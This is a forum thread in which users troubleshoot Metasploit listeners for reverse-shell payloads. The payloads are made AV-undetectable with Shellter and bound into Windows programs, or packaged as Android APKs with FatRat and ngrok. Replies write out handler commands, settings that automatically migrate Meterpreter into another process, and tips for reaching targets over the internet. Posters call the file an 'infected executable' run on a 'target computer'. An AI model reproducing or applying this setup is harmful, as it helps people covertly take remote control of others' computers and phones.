Hi, I used Shellter to create an undetectable reverse_tcp payload. Its bound with a win 32 bit application,which when run, gives us a meterpreter session. I ran it yesterday on my computer and it worked perfectly, i got a connection back. Im trying again today but msf keeps getting stuck at "Starting the Payload Handler..." I remade the payload with the new ip address and i have made sure the LHOST and LPORT are the same for the handler. Im pretty sure i havent made any typos or mistakes, here are the commands i used:
msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.3.92
lhost => 192.168.3.92
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > exploit
Note I have given a diff IP address here for privacy reasons
And im am running kali linix on VMware
Thanks for any help
12 Responses
First of all, the payload is already set by Shellter so that isn't needed in Metasploit. Next, double check that your lhost IP is your linux machine IP by typing in ifconfig in terminal. Then double check that it and lport match when creating your infected file with shellter. I am guessing that is your problem. Also make sure that your target computer is on the same network. If they are on different networks your lhost needs to be your public IP address which can be found by going to http://icanhazip.com or one of many others.
Extra Info: This is something that I do that I have learned and like doing for other learning purposes. Feel free to try it out.
Instead of Metasploit I use Armitage. I run Kali off a USB so any time I start up Kali I have to run this process but it's not hard. Armitage is a GUI version of Metasploit and becomes way easier to use. Personally I would suggest to any beginner to learn with Metasploit first though to understand the basics of how it works.
Commands in terminal::
msfupdate
apt-get install armitage
msfdb init
armitage
click connect
click yes
Once Armitage opens type what you normally would on metasploit.
use exploit/multi/handler
set lhost 192.168.x.x
set lport 4444
I then add these commands
set exitonsession false
set autorunscript migrate -f
set prependmigrate true
(The first command allow for more than one session so you don't have to keep running the exploit and the other two commands will automatically change the process as soon as you get a meterpreter session.)
Then exploit with the command: exploit -j
Then run your infected executable on your target computer.
Hi
everything was fine, but when i run the exploit -j it keeps looping opening sessions ... i got many sessions for the host that connect , and after that i get an error in each sessin after i execute any command .
the error is stdapi try command again
can you please help?
thanks
Hey thanks for replying, I tried again and omitted the
set payload windows/meterpreter/reverse_tcp step and double checked the IP i used is for the Linux machine and is the same IP i sued when making the file in Shellter. However its still stuck at "Starting the Payload Handler..." I tried to upload a screenshot too but i dont know how to, sorry im new to WHT
EDIT: btw i didnt know about using public IP if they arent on the same network, thanks for that
First my session was successfully connected but next day it hot stuck at * Starting the payload handler...
With armitage it's also same
I updated my metasploit by msfupdate
I am running Kali Linux 2016.2 full i686 on VMWare
Now it gives this error in the terminal opened with armitage that
Used the tab method: 192.168.XXX.XXX
Starting Cortana on 192.168.XXX.XXX
Creating a default reverse handler... 0.0.0.0:24238
Remote Exploit Stances
The Payload APK was installed and opened also
Screenshots herehttp://prntscr.com/dawnmu
Hey, Can anyone help me finding why I can't get a working metasploit session?
It gets stucked in starting the payload handler
I'm using ngrok for port forwarding option.
Did everything that are mentioned in the site..
Please tell me your commands for your listener and your payload. That way I can see if you are doing something wrong.
I'm using fatrat with ngrok to create a payload (android apk)
Starting ngrok :
./ngrok tcp 4564
For the payload :
set lhost 0.tcp.ngrok.io
set lport xxxx (port from ngrok)
For the listener :
The procedure is working when I'm in LAN and dont have to use ngrok.. But over wan it's not starting.
Maybe the problem is because I can't establish a ngrok tunnel properly to my machine.
Also previously I was successful using ngrok with social engineering tools, but now it gives me the error(attached image). I guess because of this only metasploit session is not opening. Please Help
Sorry, I'm unable to help. I don't know anything about ngrok. Hopefully someone else can help. I'd recommend posting your own forum topic.
Okay, Did that. Thanks Anyway.
And if you know someone who might help me with this, here is the link to my forum
null-byte.wonderhowto.com/forum/need-help-with-fatrat-over-wan-0183192/
Have a good day..
M process is stuck at "Started reverse TCP handler on 0.0.0.0(my IP using ifconfig).
Anyone knows the answer to this questions
M process is stuck at "Started reverse TCP handler on 0.0.0.0(my IP using ifconfig).???
Share Your Thoughts